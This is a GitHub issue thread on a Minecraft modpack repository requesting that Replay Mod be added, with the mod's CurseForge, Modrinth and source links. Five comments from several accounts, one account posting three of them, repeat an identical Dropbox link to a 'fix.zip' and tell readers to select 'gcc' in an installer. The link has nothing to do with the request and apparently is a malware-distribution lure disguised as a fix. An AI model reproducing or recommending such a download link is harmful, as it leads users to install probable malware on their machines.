### ISSUE TITLE
[MOD] Add Replay Mod

### ISSUE THREAD

**Issue by kkempfer** [kkempfer/Create-Survive-Explore#137]
### CurseForge URL

https://www.curseforge.com/minecraft/mc-mods/replay-mod-fabric-and-forge

### Modrinth URL

https://modrinth.com/mod/replaymod

### Source/Other URL

https://github.com/ReplayMod/ReplayMod

### Why should we add this mod in this modpack?

Records Minecraft game.

### Additional details

See also [Replay Voice Chat](https://www.curseforge.com/minecraft/mc-mods/replay-voice-chat).

### Confirm

- [X] This is not a mod update request. For that purpose, I should use the mod update form.
- [X] This is not a mod removal request. For that purpose, I should use the mod removal form.

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by kkempfer** [comment]
Not necessary in this modpack
